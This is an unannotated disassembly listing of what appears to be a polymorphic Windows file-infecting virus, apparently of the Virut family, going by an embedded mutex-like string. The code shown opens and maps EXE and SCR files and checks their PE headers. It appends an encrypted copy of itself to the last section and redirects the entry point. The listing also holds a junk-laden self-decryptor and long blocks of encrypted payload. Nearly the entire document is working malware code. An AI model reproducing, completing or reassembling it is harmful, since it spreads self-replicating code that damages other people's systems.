test eax, eax
jz locret_416A71
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_416F29
mov dword ptr ss:locret_403956[ebp], eax
lea ecx, sub_40395A[ebp]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_416F1D
push 0
push dword ptr ss:locret_403956[ebp]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_416F1D
mov dword ptr ss:loc_40396A[ebp], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr ss:locret_403956[ebp]
call dword ptr ss:loc_403560[ebp]
test eax, eax
jz loc_416F1D
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_416EF5
mov [ebp+403972h], eax
locret_416A71: ; CODE XREF: sub_4169A0+10�j
; sub_4169A0+27�j ...
retn
sub_4169A0 endp
; =============== S U B R O U T I N E =======================================
sub_416A72 proc near ; CODE XREF: sub_416B96+117�p
; sub_416B96+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_416A8C
add eax, [ebp+40106Dh]
loc_416A8C: ; CODE XREF: sub_416A72+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov dword ptr ss:word_40397A[ebp], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_416A72 endp
; =============== S U B R O U T I N E =======================================
sub_416AB7 proc near ; CODE XREF: sub_416B96:loc_416BE5�p
; sub_416B96+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_416ABC: ; CODE XREF: sub_416AB7+23�j
jecxz short locret_416AF3
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_416AF3
cmp dword ptr [edx+0Ch], 1
jb short loc_416ABC
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, dword ptr ss:loc_40396A[ebp]
locret_416AF3: ; CODE XREF: sub_416AB7:loc_416ABC�j
; sub_416AB7+1D�j ...
retn
sub_416AB7 endp
; =============== S U B R O U T I N E =======================================
sub_416AF4 proc near ; CODE XREF: __u_____:00416B80�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_416AF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_416B01: ; CODE XREF: __u_____:00416B22�j
mov ecx, edi
jmp short loc_416B10
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_416B0C: ; CODE XREF: __u_____:00416B1E�j
mov ebx, edi
xor ecx, ecx
loc_416B10: ; CODE XREF: __u_____:00416B03�j
; __u_____:00416B26�j
lodsb
cmp al, 61h
jb short loc_416B1B
cmp al, 7Ah
ja short loc_416B1B
sub al, 20h
loc_416B1B: ; CODE XREF: __u_____:00416B13�j
; __u_____:00416B17�j
stosb
cmp al, 5Ch
jz short loc_416B0C
cmp al, 2Eh
jz short loc_416B01
cmp al, 0
jnz short loc_416B10
jecxz short locret_416AF3
mov eax, [ecx]
cmp eax, 455845h
jz short loc_416B3E
cmp eax, 524353h
jnz locret_416A71
loc_416B3E: ; CODE XREF: __u_____:00416B31�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_416A71
cmp eax, 4E554357h
jz locret_416A71
cmp eax, 32334357h
jz locret_416A71
cmp eax, 4F545350h
jz locret_416A71
xor ebx, ebx
call sub_4169A0
jz locret_416A71
xor edx, edx
call sub_416B96
call sub_416AF4
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_416ED3
; =============== S U B R O U T I N E =======================================
sub_416B96 proc near ; CODE XREF: __u_____:00416B7B�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_416ED3
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_416ED3
test dword ptr [ebx+16h], 2000h
jnz loc_416ED3
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_416ED3
jecxz short loc_416BE5
cmp ecx, 101h
jbe loc_416ED3
loc_416BE5: ; CODE XREF: sub_416B96+41�j
call sub_416AB7
jb loc_416ED3
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_4156EF
xor [ebp+40342Fh], dl
mov cl, 20h
xor byte ptr ss:loc_403430[ebp], dh
loc_416C0F: ; CODE XREF: sub_416B96+92�j
push 20h
dec cl
pop eax
js short loc_416C2A
call sub_4156EF
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_416C0F
; ---------------------------------------------------------------------------
loc_416C2A: ; CODE XREF: sub_416B96+7E�j
; sub_416B96+CD�j ...
push 6
pop ecx
loc_416C30: ; CODE XREF: sub_416B96+B8�j
push 6
pop eax
call sub_4156EF
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_416C30
test dword ptr [ebp+403431h], 8
jnz short loc_416C65
cmp byte ptr ss:loc_40342B[ebp], 1
jz short loc_416C2A
loc_416C65: ; CODE XREF: sub_416B96+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_416C8C
cmp byte ptr [ebp+403429h], 5
jz short loc_416C2A
cmp byte ptr [ebp+40342Ah], 5
jz short loc_416C2A
cmp byte ptr ss:loc_40342B[ebp], 5
jz short loc_416C2A
loc_416C8C: ; CODE XREF: sub_416B96+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_416CA1
cmp byte ptr [ebp+403429h], 2
ja short loc_416C2A
loc_416CA1: ; CODE XREF: sub_416B96+100�j
and dword ptr ss:loc_4039AE[ebp], 0
call loc_41613C
call sub_416A72
call sub_416EDC
mov ebx, [ebp+403976h]
call sub_4169A0
jz loc_416ED3
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_416AB7
jb loc_416ED3
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_416D09
lea esi, loc_40343C[ebp]
mov ecx, [ebp+40106Dh]
rep movsb
loc_416D09: ; CODE XREF: sub_416B96+163�j
push edi
mov ecx, 90Fh
lea esi, dword_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_416D1D
rep movsb
loc_416D1D: ; CODE XREF: sub_416B96+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_416DD5
push dword ptr [ebx+28h]
call sub_415EA4
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_416DD5
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_416D5A
xor ecx, ecx
loc_416D5A: ; CODE XREF: sub_416B96+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_416DC1
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_416D9A
neg dword ptr [eax]
loc_416D9A: ; CODE XREF: sub_416B96+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov dword ptr ss:loc_4039AE[ebp], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_416DB8
neg dword ptr [eax]
loc_416DB8: ; CODE XREF: sub_416B96+21E�j
push ecx
call sub_416A72
pop ecx
jmp short loc_416DCD
; ---------------------------------------------------------------------------
loc_416DC1: ; CODE XREF: sub_416B96+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_416DCD: ; CODE XREF: sub_416B96+229�j
lea esi, loc_40343C[ebp]
rep movsb
loc_416DD5: ; CODE XREF: sub_416B96+191�j
; sub_416B96+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_416DEE
imul edx, 12345678h
loc_416DEE: ; CODE XREF: sub_416B96+250�j
mov [eax-1], dl
call sub_414DC2
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_416E1F
mov dword ptr ss:loc_4039AE[ebp], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_416E1F: ; CODE XREF: sub_416B96+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_416E44
push edx
call sub_41676A
pop edx
loc_416E44: ; CODE XREF: sub_416B96+2A5�j
mov ecx, dword ptr ss:loc_4039AE[ebp]
jecxz short loc_416E4F
mov [ebx+28h], ecx
loc_416E4F: ; CODE XREF: sub_416B96+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_416E60
mov [edx+8], ecx
loc_416E60: ; CODE XREF: sub_416B96+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, dword ptr ss:word_40397A[ebp]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_416E91
add ecx, [ebp+40106Dh]
loc_416E91: ; CODE XREF: sub_416B96+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_416EB3
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_416EB3
mov dh, byte ptr ss:loc_403430[ebp]
loc_416EB3: ; CODE XREF: sub_416B96+307�j
; sub_416B96+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_416ECA
loc_416EBF: ; CODE XREF: sub_416B96+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_416EBF
jmp short loc_416ED3
; ---------------------------------------------------------------------------
loc_416ECA: ; CODE XREF: sub_416B96+327�j
; sub_416B96+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_416ECA
loc_416ED3: ; CODE XREF: __u_____:00416B91�j
; sub_416B96+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_416B96 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416EDC proc near ; CODE XREF: sub_416B96+11C�p
cmp dword ptr ss:locret_403956[ebp], 0
jz locret_416A71
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_416EF5: ; CODE XREF: sub_4169A0+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, sub_40395A[ebp]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr ss:locret_403956[ebp]
call dword ptr [ebp+4035B8h]
loc_416F1D: ; CODE XREF: sub_4169A0+6B�j
; sub_4169A0+82�j ...
push dword ptr ss:locret_403956[ebp]
call dword ptr [ebp+40353Ch]
loc_416F29: ; CODE XREF: sub_4169A0+45�j
lea esi, [ebp+40384Eh]
push dword ptr ss:loc_403952[ebp]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr ss:locret_403956[ebp], 0
retn
sub_416EDC endp
; ---------------------------------------------------------------------------
dd 0E8h, 16A5D00h, 3349ED81h, 0F0580040h, 8085C10Fh, 85004015h
dd 0C883C3C0h, 0C10FF0FFh, 40158085h, 103DC300h, 75002A00h
dd 7C81661Ch, 716C0C24h, 0E8601375h, 0FFFFFFC4h, 7EE80575h
dd 0E8FFFFFBh, 0FFFFFFD2h, 2DFF2E61h, 12345678h, 25B8h
dd 0A5E86000h, 75FFFFFFh, 24448B39h, 4EB58D30h, 8B004038h
dd 81660850h, 7302063Ah, 685625h, 8B00FF00h, 52006AC4h
dd 0F895FF50h, 83004035h, 3E8108C4h, 5C3F3F5Ch, 0C6830375h
dd 0FB2BE804h, 7FE8FFFFh, 61FFFFFFh, 74B8C3h, 0B1EB0000h
dd 2FB8h, 10E800h, 20C20000h, 30B800h, 3E80000h, 0C2000000h
dd 548D0024h, 2ECD0C24h, 7C00F883h, 0E86019h, 8B000000h
dd 5D302454h, 0ED811A8Bh, 403413h, 0FFE539E8h, 4C261FFh
dd 7060100h, 51050203h, 0EE904487h, 3815FF33h, 90004432h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_417059
jmp short $+2
nop
cmc
nop
call near ptr word_4170FE
mov ebp, 0CB982DF4h
cmc
jmp loc_417090
; =============== S U B R O U T I N E =======================================
sub_417059 proc near ; CODE XREF: __u_____:0041703F�p
push dword ptr fs:0
mov dword ptr ds:loc_412012+1, ebp
stc
mov fs:0, esp
xor ebx, ebx
push 80000000h
push ebx
push ebx
push 10h
push ebx
push 80000000h
push 80000000h
push 4000h
call ds:dword_40700C ; LoadLibraryA
loc_417090: ; CODE XREF: __u_____:00417054�j
stc
sub eax, eax
loc_417093: ; CODE XREF: sub_417059+40�j
dec al
or al, al
jz short loc_41709D
jnz short loc_417093
jmp short near ptr dword_417104
; ---------------------------------------------------------------------------
loc_41709D: ; CODE XREF: sub_417059+3E�j
clc
jmp short $+2
xchg ebx, ebx
mov edx, edx
stc
call loc_4170AC
nop
stc
sub_417059 endp ; sp-analysis failed
loc_4170AC: ; CODE XREF: sub_417059+4C�p
pop edx
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 13h dup(0)
db 2 dup(0)
word_4170FE dw 0 ; CODE XREF: __u_____:00417049�p
dd 0
dword_417104 dd 0Eh dup(0) dd 7C809B47h, 7C8308ADh, 7C910331h, 7C80ADA0h, 3 dup(0)
dd 7C80BDB6h, 7C801A24h, 7C80945Ch, 7C802367h, 7C81042Ch
dd 7C810637h, 7C864B0Fh, 7C80C058h, 7C80E7ECh, 7C81153Ch
dd 7C810A77h, 7C831C45h, 7C80B6A1h, 7C8608FFh, 7C835DCAh
dd 7C8111DAh, 7C812ADEh, 7C801D77h, 7C80B905h, 7C80BB76h
dd 7C8309E1h, 7C863DE5h, 7C863F58h, 7C812782h, 7C831CB8h
dd 7C802442h, 7C810B1Ch, 7C80B974h, 7C809A51h, 7C810D87h
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
dd 380036h, 417258h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 710000h, 0Ch dup(0)
dd 0E0000000h, 7FFDh, 2692h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_421017
call sub_42105C
push dword ptr fs:0
pop ebp
sub ebp, 0FFFFFFF8h
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421017 proc near ; CODE XREF: start+3�p
; FUNCTION CHUNK AT 0042108A SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004210E7 SIZE 00000069 BYTES
sub eax, eax
loc_421019: ; CODE XREF: sub_421017+8�j
dec al
or al, al
jz short loc_421023
jnz short loc_421019
jmp short loc_42108A
; ---------------------------------------------------------------------------
loc_421023: ; CODE XREF: sub_421017+6�j
sub edi, edi
sub ecx, ecx
mov cl, 0B4h
loc_421029: ; CODE XREF: sub_421017+13�j
inc edi
loop loc_421029
call $+5
pop esi
sub esi, 0FFFF9031h
push esi
mov ecx, 24A5h
loc_42103E: ; CODE XREF: sub_421017+33�j
mov al, [esi]
sub ax, di
mov [esi], al
inc esi
dec ecx
cmp ecx, 0
jnz short loc_42103E
pop esi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp esi
sub_421017 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42105C proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_42105C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0B5h, 81h, 0EDh
dd 301006h, 1082858Dh, 8B660030h, 0FFFF9B90h, 0FF84E8FFh
dd 5761FFFFh, 314FBD6Ah
db 42h, 21h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421017
loc_42108A: ; CODE XREF: sub_421017+A�j
dec esp
jmp short loc_4210E7
; END OF FUNCTION CHUNK FOR sub_421017
; ---------------------------------------------------------------------------
db 5Ch, 4Bh, 7Ch
dd 0AB55C8BCh, 0C01AE661h, 4AD3495Ah, 0BEF6A0DAh, 1B8F5987h
dd 0CE62FA60h, 55D2D785h, 0FA39E191h, 0E867103Eh, 0A8BC1073h
dd 4FD72132h, 0D2286EC4h, 465CE6E7h, 230FDEF5h, 2F1F50FFh
dd 1AB5BFE4h, 0F4699928h, 5E3DF47Ah, 0BAEB6C8Bh, 0EFA80444h
dd 8DC4469h
db 43h, 75h, 0E3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421017
loc_4210E7: ; CODE XREF: sub_421017+74�j
xor dl, [ebp-65338E18h]
test ss:[eax+331F7F2Eh], ebp
lea esp, [ebx+18h]
in eax, 6Fh
insd
mov ah, 0B4h
xor eax, 74C2AD2Eh
inc edi
fsubrp st(6), st
push dx
popf
cmp cl, [edx]
test esi, 2D6FFE04h
pop edi
mov edx, 0D4990F40h
dec ebp
sahf
or [ebx+ecx*2], bl
mov dl, 33h
aas
mov ecx, edx
db 3Eh
outs dx, byte ptr [esi]
cmp [ebx-6Ah], al
call far ptr 7563h:1305D64h
in eax, 0E2h
insb
mov esp, 0F3C9CC03h
pop ebx
pop ebx
shr dword ptr [ebp-0B3AEC88h], 1
pop ecx
push 0CF450077h
xor al, 0A2h
sub ebp, ds:0A81B7427h[esi]
arpl bp, bp
insb
fdivr qword ptr [ecx]
; END OF FUNCTION CHUNK FOR sub_421017
; ---------------------------------------------------------------------------
dd 275AE0DAh, 1CBB1432h, 0BC1C92A3h, 0DE83F1B3h, 24E15666h
dd 0BEE9E182h, 0DC119718h, 6285CBECh, 0DADB5112h, 0A4478D96h
dd 0F32E76BBh, 59558081h, 8AF953DEh, 81BB4544h, 0E94F264Fh
dd 5DA2241Bh, 2D335EE8h, 34654737h, 86BCAB9Bh, 0E52699BFh
dd 637B6984h, 0A7EA4562h, 0A529CD31h, 0A89E243Eh, 0CF70EA1Bh
dd 2D60D601h, 6555F03Ch, 99E19BD9h, 0DB046A7Bh, 9F07D9D4h
dd 0C1A03E0Eh, 1CAA207Fh, 2619FD00h, 0BC6DD3CDh, 5CCACB03h
dd 6A2FA5A6h, 0CF11320Ah, 2F786959h, 0A1DD5EF3h, 825AAC2Bh
dd 0EE993F1Ch, 756B0D78h, 0D8FE22CFh, 29D03153h, 0E3776F18h
dd 41A6B546h, 9DFBF8C3h, 568CA37h, 7FF292E4h, 69ABB07h
dd 3267DEB3h, 0F4DD41BDh, 7429AFB4h, 198EA145h, 0B815E76Ch
dd 0F1584544h, 14B04D25h, 0DD930D06h, 3E74EA8Fh, 0C0C034C9h
dd 86369C80h, 3E93824Dh, 0ACF96F6Dh, 0A7B30150h, 0E2BD3731h
dd 6577D412h, 1B819CA4h, 2C61D6BDh, 0EED747B7h, 9923A9B2h
dd 0D3047B71h, 9F06C8A2h, 90213F0Eh, 9FAB211Fh, 578D01AAh
dd 0DA37E48Bh, 0E445AFC9h, 0CD1CCF30h, 1CE36387h, 0ECF1D7EAh
dd 0AED64C7Ah, 82BAA3AFh, 639CF80Ch, 1135F1EDh, 27109E8Bh
dd 2520264Eh, 5E9394A3h, 0CD3061CBh, 136F9164h, 8FF41641h
dd 983511A8h, 5287FF3Eh, 18C1635Fh, 1949BF8Eh, 0F828F924h
dd 0A7890982h, 44EE5448h, 195F4735h, 7D82031Fh, 75ADB786h
dd 0BF8AEBD8h, 0A559CCCAh, 437AF96h, 0CA890B05h, 0B7057040h
dd 2E59DD50h, 8BE0419h, 5A8B90AEh, 4C7E08F4h, 35E5D7D6h
dd 9B43B9BAh, 0C2081B1Fh, 0D576837Ch, 9E65DBD1h, 2B4B400Fh
dd 779C09ADh, 588EFBFEh, 3B9362EDh, 91DBC6C4h, 0FE018B23h
dd 91EC906Bh, 5B70E46Bh, 23D77D60h, 0B392B591h, 6464EE0Dh
dd 9DFBFDEEh, 0C05DD3D1h, 0A3EB554h, 0C0E02819h, 18A7746h
dd 76155932h, 13C14BC6h, 31CD1EFBh, 39DF07F8h, 0B871B5DDh
dd 275F570Ah, 0F93718A1h, 0DF808383h, 43109B28h, 107A21B9h
dd 7EB36423h, 0F4F30B08h, 0EA72AB64h, 45FB29F9h, 8EC34C06h
dd 8F19E55Bh, 0C8FB1125h, 0A9B79FD9h, 8AD5F1B8h, 6BA1177Ch
dd 1CC292FDh, 7F6DB385h, 3DCD2F46h, 707D9BABh, 816F3DB9h
dd 3DE95F3Fh, 1CCB2B94h, 12A949EDh, 0B8D6F02h, 6F18E689h
dd 7751C7A5h, 58F9A7h, 6C8175D9h, 9DF65C47h, 0AC27CB15h
dd 84BB0DA9h, 65299F0Eh, 0FE7DC3FFh, 295EDCC4h, 0AECC5A38h
dd 0FD207B14h, 4A8F7847h, 0B0D44E5Fh, 44BDCC5h, 72980749h
dd 151C00AEh, 0DE6AD0F2h, 184BC1D6h, 9143CDEEh, 0AE5EF4F1h
dd 0D199100Fh, 0C8B72F22h, 1AC14649h, 9FC60C48h, 725C347Fh
dd 0F9DD47CCh, 56399F85h, 823AFAC4h, 5C698D8Dh, 2FDE647Fh
dd 0B4B569F4h, 3AA07283h, 245772A0h, 218C88D9h, 4145BBBAh
dd 9643D8F9h, 0A458190Bh, 0DB831609h, 98A92524h, 0A43BDB74h
dd 0D1903628h, 6A27B120h, 0E1059E96h, 301FD03Dh, 0F2D0098Ah
dd 0E63933Bh, 0CED87E66h, 7AB85A2Eh, 56B0179Ah, 49554AF0h
dd 1C9D4D2h, 28333C55h, 7BDFC1C2h, 0D0325429h, 1467AC69h
dd 92F610D6h, 8CFF4A1Ch, 65A5AA68h, 43AA65DFh, 0E7C8879Dh
dd 4C2D0A7h, 0B706A0F1h, 41DA0C67h, 0AFFE05DDh, 0F474AF29h
dd 947E9FD6h, 7077EDEFh, 15BB5F04h, 2BD42A96h, 0C16F90A1h
dd 0DA1CB3F2h, 0FF8E5454h, 0DC916065h, 0F85D4B46h, 4FB3D20Ah
dd 453D1A5Ch, 373144B4h, 18A31395h, 3F084E53h, 47159D0Dh
dd 5459BD11h, 91AE1408h, 7354879Ch, 6A71E7E4h, 349F5D38h
dd 94CCA999h, 0E324A146h, 3B0C8284h, 0A5D84EB1h, 0B5E0302Fh
dd 36CD43D9h, 497C9BA0h, 0EFD5D4D7h, 155E5E4h, 2C72521Ch
dd 85741D2Fh, 4D04B25Bh, 64BC3C3h, 74980B51h, 6D8AEACh
dd 13BB751Fh, 0DEC8C1F2h, 3A76184h, 0DE56DCDEh, 0BFF0463Ch
dd 0A0D258EBh, 81B42A2Bh, 62960C0Bh, 4477EDECh, 0D90B989Fh
dd 38127625h, 46433B92h, 3089B2F0h, 0F01DBAB7h, 0E8B35774h
dd 0BCF7959h, 3AE1B69Ch, 4110B9BFh, 7720E8E0h, 844FCAEAh
dd 0B4080BF4h, 0DA981411h, 0F6CC3622h, 17DC5057h, 1F906860h
dd 4A108294h, 4C3B8EADh, 4133E8CFh, 9075EFFEh, 0A99F2A0Bh
dd 0D6B9032Ah, 0E0D45940h, 1ADF1250h, 2F099297h, 4F31A684h
dd 4F4CC6D3h, 9552D598h, 80670C1Bh, 0C78B3739h, 0E6AE6858h
dd 75CC7F7Bh, 36EC8DBCh, 513E8595h, 7F2AA4B1h, 985EE1A5h
dd 8B6BF0E6h, 0A89C0906h, 92A2242Fh, 0E3DA7919h, 0CFE7F7Ch
dd 3D32ED99h, 4F0CBAA6h, 6D58CAC3h, 9F7FD793h, 0A9901B33h
dd 0DFAA2017h, 0FAB5545Eh, 6FE36B7Dh, 17F79CBEh, 6001B6B2h
dd 1520C1D4h, 0B152F9D8h, 8D6D12E8h, 0BA8F0D0Ah, 0D6B82703h
dd 10DB404Ah, 31F94063h, 5210A982h, 665289ACh, 6C7EDDCEh
dd 8078FFE9h, 0A2980D27h, 0A7992B3Ch, 0DBCE5576h, 0CE8616Bh
dd 3914B79Eh, 422AB7B0h, 0F7ECCC5h, 0A554F3DEh, 9572151Eh
dd 0FA813634h, 0D4A3515Fh, 2CD591Fh, 27E76554h, 511F80B1h
dd 7E0BC282h, 8F48F5D1h, 0B160ECF4h, 0B4942069h, 0D2A12C1Ch
dd 0C7DB4442h, 24974C74h, 2A2E9A88h, 4234BAA3h, 665CDEF8h
dd 9F7AFCE1h, 8D931C1Ch, 0D9BA1256h, 0EAAF5E60h, 2BD06E77h
dd 32E18890h, 4A17B4AFh, 7A2AFBBDh, 0B64BFCFDh, 0BA6613EDh
dd 0DB842D63h, 0F9A40F20h, 5DD4457h, 3CDC0747h, 5A1BBE97h
dd 673586BEh, 351C6C2h, 8B70FBC2h, 0A39B0429h, 0D7A92E1Dh
dd 0C9DC5F58h, 0CED5C12h, 240CA49Dh, 5E2CB0B6h, 6032E6B7h
dd 8252F2FAh, 0BA454B48h, 0B491282Fh, 0F6A84F6Eh, 45DA6C7Ah
dd 2FEE4F32h, 5C3EE295h, 720BA7A2h, 0AE2EC1C9h, 0B656F2E2h
dd 0B4B30D05h, 0C3BD383Eh, 0F1D3585Eh, 6CB0E4Dh, 2910A999h
dd 4E3580AAh, 7B5EC5DFh, 9F79C193h, 0A9921D33h, 0C88D3F02h
dd 0EBAE6B37h, 3AA46A7Dh, 21E49697h, 4403B58Dh, 7C01DBF2h
dd 0A128FBF3h, 0AC7EF2E8h, 0D6AD0E02h, 9BAD2B28h, 8D95472h
dd 31FB4E63h, 4B3DE982h, 543EAE88h, 7165DFD8h, 897FFAE4h
dd 0B59D090Ah, 0C2B13F04h, 0FCF2325Fh, 8FB6651h, 22399087h
dd 6360B3B9h, 6A33F4C3h, 0A147ECF8h, 0B6671509h, 0FAE62F2Eh
dd 0F0BA7D4Ah, 26CF547Eh, 32EF6D72h, 41289092h, 583A8AC3h
dd 894EC0D7h, 0BC74D4E2h, 0AE9C001Dh, 0ECA1054Ah, 0EBE15D4Ah
dd 5D67869h, 311995BEh, 2735BEA6h, 7973C6FFh, 825BFDF6h
dd 82FF1019h, 0C8911822h, 0E1B16959h, 1CD67E7Bh, 34ED93ADh
dd 4729DDB5h, 7B2DCEF2h, 834AFACCh, 0D965EEE8h, 0C8BD172Dh
dd 0F8AA312Bh, 0ED87151h, 31F27C72h, 50198FAAh, 6F55B2BBh
dd 6643FDDFh, 9C44F4FFh, 0AB9C1B1Ch, 0C8BD3F19h, 0FCDC5E43h
dd 69F17A7Bh, 39D782BDh, 7B04A3BCh, 7A36CADEh, 946EF5F8h
dd 0AA771416h, 0D8930F5Dh, 0F6A0516Bh, 25CE4570h, 39E47174h
dd 7801B086h, 4826B6ADh, 9359D4D1h, 8C4588E0h, 0A1803928h
dd 0D1A33838h, 0EDD44D2Bh, 0CE9757Fh, 311E9A8Eh, 4933B1CFh
dd 7D5ED6DFh, 9F7BF393h, 0B973191Dh, 0CF8C2135h, 0FDC45F55h
dd 70D07F7Ch, 36E99889h, 5707ADDCh, 163DDAD5h, 9D5ECEE9h
dd 0AE69ECF0h, 0C8810827h, 0F2B10E20h, 7DD74442h, 3BE0644Eh
dd 3410859Ah, 6122A98Dh, 6159C3C3h, 827DFAEDh, 0B39B0423h
dd 0C6955234h, 0E7CC5146h, 1AEF6276h, 4CC09991h, 4B16B69Fh
dd 6426D7CAh, 9C41EAD5h, 956A0E29h, 0C186175Eh, 0F3A4325Ah
dd 16C97054h, 34E74265h
dd 7E2EE587h, 55008792h, 0BA1F9595h, 0B213C5C4h, 0ADB60C0Fh
dd 0E9B23E24h, 0D1B95649h, 14D47668h, 23379C8Bh, 692596A9h
dd 6D5BE6B2h, 9E7AE0C5h, 0A260210Fh, 0D7A63C2Dh, 0F5973B78h
dd 5C24E7Dh, 26E49FADh, 74119AB8h, 12A343BFh, 917A698Ah
dd 330D8383h, 0BFCB29E8h, 98BB472Ch, 14E07976h, 0F59800Dh
dd 15263862h, 71068DA1h, 98AD51FEh, 6419BFA3h, 5D047DB5h
dd 0A9ED7FF7h, 49B7F1B0h, 0C2249A43h, 7E82C8E0h, 2F098928h
dd 84BBB4D3h, 0F315B7D2h, 5108BDF8h, 0B6E95FCFh, 0F79F2910h
dd 0AC262321h, 95040568h, 3B18A689h, 7751D7C5h, 0FF58FAA5h
dd 0E174DEE1h, 93F6066Bh, 36271E1Fh, 848A1CA0h, 0F0634B51h
dd 474DD822h, 752A2B54h, 1EBF3838h, 0E1C396A5h, 0DF02EDFAh
